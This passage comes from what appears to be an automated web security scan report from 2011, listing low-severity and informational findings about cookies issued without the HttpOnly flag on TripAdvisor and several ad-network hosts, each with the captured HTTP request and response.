Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.CA5B1B8B5844B487705CCB63281E5A9D*SQ.1*MC.11539*GR.52*TBR.4*EXEX.78*ABTR.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1285

GIF89av....:............q......m.Z.....n000...@@@...w.f...............w.e```......ppp.....}............ ..}PPP.......!.YL)we7..<3......`.r>hX0.....g...........S..L......b.NX.B...................
...[SNIP]...
14.83. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.D003686BE8331A8DC70A23D10F4589D0*SQ.1*MC.11539*GR.23*TBR.31*EXEX.3*ABTR.21*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AYlcHw2yynj9VaPDGh0MhGA7WhW0nFykhjayN3jcE9A%2FT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1307

GIF89av....:.........q.........m.Z.....n000...@@@...w.f...............w.e...```.....}...ppp...........} ...PPP........we7.!.YL)..`hX0.r>...<3...............g........L..Sb.NX.B...................
...[SNIP]...
14.84. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=A.2.12811.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:37:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2132

GIF89a..3.......w.f......DDE.........T.@...%%&...k.Y............TTU...sst...556.........`.Mccd............ddd.....s.................i..*..x..Z.qD%!..J_..b......D;%....Ym......sc<......5...........cV4I
...[SNIP]...
14.85. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/partner/tripAdvisorLogo-11007-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TACds=C.1.11539.1.2011-10-02; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.12*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals*FBH.2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:47 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.2.11007.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:01:47 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1211

GIF89ak...............q.?......trsQMO.....m....!..............|.....V...................**_O4..[.....}{gD...^cf.......TighZWX....~..i......EAA...=99_\_..............................................
...[SNIP]...
14.86. http://www.tumri.net/ads/ads  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tumri.net
Path:   /ads/ads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:09:11 GMT
Expires: Mon Oct 03 00:09:11 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-1000424298|547040017; Domain=.tumri.net; Expires=Tue, 02-Oct-2012 00:09:11 GMT; Path=/
Set-Cookie: JSESSIONID=4BD4DF728C0984070FCE52BC4AA1C77B; Path=/ads
Content-Length: 1
Connection: keep-alive


14.87. http://a.collective-media.net/adj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.guardian/;sz=300x250;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 416
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:50:07 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
14.88. http://a.collective-media.net/cmadj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
14.89. http://a.intentmedia.net/adServer/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.intentmedia.net
Path:   /adServer/beacons

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/beacons?entity_id=45&site=EXPEDIA&cache_buster=1317600641956&product_category=hotels&is_details_page=N HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 03 Oct 2011 00:12:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:12:12 GMT
Set-Cookie: a6="WyUB7GQUJJdFm%2FT%2B7nUbOmv6Yc16PxIts4eXtTMWx5kPcK1kQ%2F2WkbOfzMMQg0NRXGj44wZDYMi2N0QXyjAeHrolfTf2FCxQm4sh2nOGVK2MEGOoSxsFasziQqJbYof3ozi53bs8%2FBwDexviMpe%2BO5CVTix8R7m2FnR%2BYphnrgshVpmyFe2A1I%2BEdR0b9EgJ5yIozncTSkQ%3D";Path=/;Expires=Wed, 02-Oct-13 00:12:12 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 0
Connection: keep-alive

14.90. http://a.intentmedia.net/adServer/impressions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.intentmedia.net
Path:   /adServer/impressions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/impressions?publisher_session_id=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&cache_buster=1317600538540&product_category=hotels&site=TRAVELOCITY&time_zone_offset=300&submarket_id=MA134-0100&rooms=1&travelers=1&ad_unit_id=5&hotel_property_ids=4810_114273_46356_10677_601_41209_48167_28920_4643_25625_12989_1013_13360_64654_44777_9773_11430_10448_46065_32162_20077_1228_12056_34410_9074_202264_620_914_7745_27993_79419_50883_102143_12018_9817_2841_13114_2004_70926_1322_58534_774_12062_48559_26931_2738_15077_44999_52173_3_1747_20114_26186_65482_52374_22259_56985_19411_22479_32159_85128_16231_2844_18685_64276_57481_2837_1213_28041_11122_34000_35409_75432_80723_34758_24713_35992_34361_49791_54902_31216_7256_9239_50684_28588_16565_25026_33473_16477_35131_35054_24709_23560_22574_26118_138019_44277_4680_309_45625_39186_30198_44375_85127_63829_7921_31749_8178_42595_20007_119214_119432_119478_40415_103982_10487_10678_14412_21745_23568_25299_26117_30034_35838_41236_4470_49886_56521_59519_62421_64032_8867_10158_10348_13_25492_27425_54939_6073_18969_119779_119627_44593_62214_8046_33150_111060_64750_144426_138764_139993_121079_123761_124226_141217_45783_60995_80644 HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:09:04 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:09:04 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 259
Connection: keep-alive

try{if (IntentMedia) {IntentMedia.PUBLISHER_REPORTS=false;IntentMedia.MONTHLY_ASAP_BUDGETS=false;IntentMedia.SUPPRESS_CHEAPTICKETS_GLOBAL=true;IntentMedia.SSN_ORBITZ_GLOBAL_SHOW_REVIEWS_TEST=false;Int
...[SNIP]...
14.91. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=41533529378 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Mon, 03 Oct 2011 00:15:06 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sun, 01 Jan 2012 00:15:06 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:15:06 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...
14.92. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:12 GMT;
Content-Type: text/html
Location: /z/i.cid?c=395973&ev=1&page=Samplehomepage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>
14.93. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=3930898683&th=41533529378&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D26071%26s%3D26072&f=2&p=759881&a=1&rnd=755916 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:13:42 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1853089121 = new Image();\r\n tfimg1853089121.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\
...[SNIP]...
14.94. http://a.tribalfusion.com/z/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:28 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;
14.95. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N270.N270.EMEA_StratDev/B3867719.15

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

